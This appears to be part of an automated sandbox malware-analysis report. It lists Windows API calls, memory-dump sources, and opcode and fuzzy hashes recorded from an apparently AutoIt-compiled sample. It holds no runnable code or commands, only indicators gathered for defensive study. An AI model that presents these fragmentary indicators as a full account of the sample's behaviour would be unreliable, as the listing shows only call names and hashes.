                                                                                                                                                                                                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 146765662-0
                                                                                                                                                                                                                                                      • Opcode ID: 4ef09a2b695dd03b37b170acfabd0113f401c3583be8724fb53d93849bd37950
                                                                                                                                                                                                                                                      • Instruction ID: 7164a86178957edb77d282422de9174517f3ddfb9dce4d1542d9f30317ffae75
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4ef09a2b695dd03b37b170acfabd0113f401c3583be8724fb53d93849bd37950
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92E0E63E104009BFCB022F95DC08869FFB6FF997213108221FA1581575CB329471FB51
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2889604237-0
                                                                                                                                                                                                                                                      • Opcode ID: 418759380c82da85c4c579eeb19c4b14e72763ef3a815ee411f8ae0df0f05d45
                                                                                                                                                                                                                                                      • Instruction ID: d12c7d5f16118581de70a1e280dad5cad6b0789e2a0a6d0bb6ff97f70d7731d2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 418759380c82da85c4c579eeb19c4b14e72763ef3a815ee411f8ae0df0f05d45
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6AE04FB9100208EFDB015F70CC4C66E7BA8EF5C350F12D80AFD5A97310CB749841AB40
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2889604237-0
                                                                                                                                                                                                                                                      • Opcode ID: 0f6ee4590a9666a37ba6dec626c3b70bbd741478df9a3532995afa38ac10d976
                                                                                                                                                                                                                                                      • Instruction ID: 7e2b7f672b285a3e196859d5af8467f19fa06db9bdd134199abd67e8b7c78eb8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f6ee4590a9666a37ba6dec626c3b70bbd741478df9a3532995afa38ac10d976
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BFE04FB9500208EFDB015F70CC4866D7BA8EB5D350F12940AFD5A97310CB7998019B00
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • OleSetContainedObject.OLE32(?,00000001), ref: 00EFDEAA
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ContainedObject
                                                                                                                                                                                                                                                      • String ID: AutoIt3GUI$Container
                                                                                                                                                                                                                                                      • API String ID: 3565006973-3941886329
                                                                                                                                                                                                                                                      • Opcode ID: c756c71c72ed7f29c399c6c1f176ae48986904c0bcd2968a778b239266f69698
                                                                                                                                                                                                                                                      • Instruction ID: acff4c390859686888165562a328cf42b4e93819dcd3595085448c2fe0132a2f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c756c71c72ed7f29c399c6c1f176ae48986904c0bcd2968a778b239266f69698
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF914570604605AFDB24CF64C884F6ABBFABF49714F10856EF94ADB291DB71E841CB60
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000), ref: 00EDBCDA
                                                                                                                                                                                                                                                      • GlobalMemoryStatusEx.KERNEL32 ref: 00EDBCF3
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                                      • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                                                      • Opcode ID: 2c0d3d9e382c6dc8f512af5e28505653fcc1172c92e4fc6c4e27724f5594846c
                                                                                                                                                                                                                                                      • Instruction ID: 4a0804ea233e3a3f87c89e4276766950dd81c9bd702015f993e993265f50e349
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c0d3d9e382c6dc8f512af5e28505653fcc1172c92e4fc6c4e27724f5594846c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 795147714187489BE320AF14DC86BAFBBE8FFE4354F41484EF2C8511A2DB7089A98752
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EC44ED: __fread_nolock.LIBCMT ref: 00EC450B
                                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00F0C65D
                                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00F0C670
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _wcscmp$__fread_nolock
                                                                                                                                                                                                                                                      • String ID: FILE
                                                                                                                                                                                                                                                      • API String ID: 4029003684-3121273764
                                                                                                                                                                                                                                                      • Opcode ID: 7c7799a65eff1d328566c1b6ed22f49c9cccf2a815b011972e930f3bf4545770
                                                                                                                                                                                                                                                      • Instruction ID: f737fcb63039f33869de119b7da4d22c3fb9f12d8a7605792a72bc8fd9afd5ff
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7c7799a65eff1d328566c1b6ed22f49c9cccf2a815b011972e930f3bf4545770
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC41E572A0020ABADF209BA48C41FEF77F9AF49710F001069F615FB1C1D6729A05EB91
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00F2A85A
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F2A86F
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                                      • String ID: '
                                                                                                                                                                                                                                                      • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                                      • Opcode ID: ab5f181b2697c796df533cd62993ba1718d83462db9a4a11ba327b4db05913d9
                                                                                                                                                                                                                                                      • Instruction ID: 9b6e5d7c678b769373f92147c3d3fb992c725609707d2802105ab82e3718a967
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab5f181b2697c796df533cd62993ba1718d83462db9a4a11ba327b4db05913d9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B6411875E013199FDB14CFA8D880BEA7BB9FB08310F14016AE905EB381D770A942DFA5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00F15190
                                                                                                                                                                                                                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00F151C6
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CrackInternet_memset
                                                                                                                                                                                                                                                      • String ID: |
                                                                                                                                                                                                                                                      • API String ID: 1413715105-2343686810
                                                                                                                                                                                                                                                      • Opcode ID: 58f85502fc31233c67f1451b58395001896ba83fd48b147a441273221e547165
                                                                                                                                                                                                                                                      • Instruction ID: 5deeac69f1cce4fb23918c4cb9d7e33e6f76cbdde5517732a3f681e140c859fd
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 58f85502fc31233c67f1451b58395001896ba83fd48b147a441273221e547165
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A5313872C00109EBCF15EFA5CD85EEEBFB9FF54710F100019E809B6166DA31AA46DBA0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,?), ref: 00F2980E
                                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00F2984A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$DestroyMove
                                                                                                                                                                                                                                                      • String ID: static
                                                                                                                                                                                                                                                      • API String ID: 2139405536-2160076837
                                                                                                                                                                                                                                                      • Opcode ID: d421c77db5104ba0c20e0d84906ce07f36dbe78d249898f47cd648498b1283a4
                                                                                                                                                                                                                                                      • Instruction ID: 26b1e7d5cf9c5d576b6cee84004c507c9fba7a2500c4e6acfff1fc2f3c41ac94
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d421c77db5104ba0c20e0d84906ce07f36dbe78d249898f47cd648498b1283a4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B31B171510214AEEB109F74DC80BFB73A9FF59760F14861AF8A9D7190CB70AC81E760
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00F051C6
                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F05201
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InfoItemMenu_memset
                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                      • API String ID: 2223754486-4108050209
                                                                                                                                                                                                                                                      • Opcode ID: 1d47140bcdf2c77f95099aa270a40efe1e2e39176e2808881cb92dfb1941fc29
                                                                                                                                                                                                                                                      • Instruction ID: f3aa39bfed493db944d6d6c3df3e5820910e0282d29af873036a1ba29642133f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d47140bcdf2c77f95099aa270a40efe1e2e39176e2808881cb92dfb1941fc29
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09318F32A00604EBEB24CF99D945BAFBBF8AF45B60F144419E995A61E0D7F09A44FF10
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __snwprintf
                                                                                                                                                                                                                                                      • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                                                                                                                                                      • API String ID: 2391506597-2584243854
                                                                                                                                                                                                                                                      • Opcode ID: da8f1fc5e2ba457f17f656f15d1ef70c059b769a83d6d3fa5c2c98a95cab3b19
                                                                                                                                                                                                                                                      • Instruction ID: 19d173ab10b7d5d42fc7cbc35ede16def0381ee3148426ec66c9513c2e05c137
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da8f1fc5e2ba457f17f656f15d1ef70c059b769a83d6d3fa5c2c98a95cab3b19
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E217F71600218AECF10EF64C981FED73B5AF55300F054459F505FB142DB71EA86EBA2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F2945C
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F29467
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                                      • String ID: Combobox
                                                                                                                                                                                                                                                      • API String ID: 3850602802-2096851135
                                                                                                                                                                                                                                                      • Opcode ID: aa4dd58041b91716cdda7bb367a67c90cf34a2a39a17dfcc38fc3f84e3e2b1ff
                                                                                                                                                                                                                                                      • Instruction ID: 297c73e91c8fca72776a1989a722e1aefe7c805bea3fb6e278e1c9b2b6122e4d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aa4dd58041b91716cdda7bb367a67c90cf34a2a39a17dfcc38fc3f84e3e2b1ff
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5119071704218AFEF15EE54EC80EBB376EEB483B4F104129F95997290D6B19C52A760
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EDD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EDD1BA
                                                                                                                                                                                                                                                        • Part of subcall function 00EDD17C: GetStockObject.GDI32(00000011), ref: 00EDD1CE
                                                                                                                                                                                                                                                        • Part of subcall function 00EDD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EDD1D8
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00F29968
                                                                                                                                                                                                                                                      • GetSysColor.USER32(00000012), ref: 00F29982
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                                                                      • String ID: static
                                                                                                                                                                                                                                                      • API String ID: 1983116058-2160076837
                                                                                                                                                                                                                                                      • Opcode ID: a3b6161dc207b9f2307e6af6a6e9e62091c29c2e14d6f5d95bdf0a85ca763dc4
                                                                                                                                                                                                                                                      • Instruction ID: 4d7f341f9b2a72a6112c550b2b844171ac9fd2d040a77088f5361aed8845b6ef
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a3b6161dc207b9f2307e6af6a6e9e62091c29c2e14d6f5d95bdf0a85ca763dc4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 10116A72510219AFDB04DFB8DC45AFA7BA8FB08314F054619FD55E3250E774E851EB50
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 00F29699
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00F296A8
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: LengthMessageSendTextWindow
                                                                                                                                                                                                                                                      • String ID: edit
                                                                                                                                                                                                                                                      • API String ID: 2978978980-2167791130
                                                                                                                                                                                                                                                      • Opcode ID: daa311396ee08077968cf1e8cf7d7f2568674e26d99e51cbcbbb59145175f780
                                                                                                                                                                                                                                                      • Instruction ID: 7d2e3b3edef04c167ffb4d8910f0751f4e6da096e027c71691fcbbb94ae40a2b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: daa311396ee08077968cf1e8cf7d7f2568674e26d99e51cbcbbb59145175f780
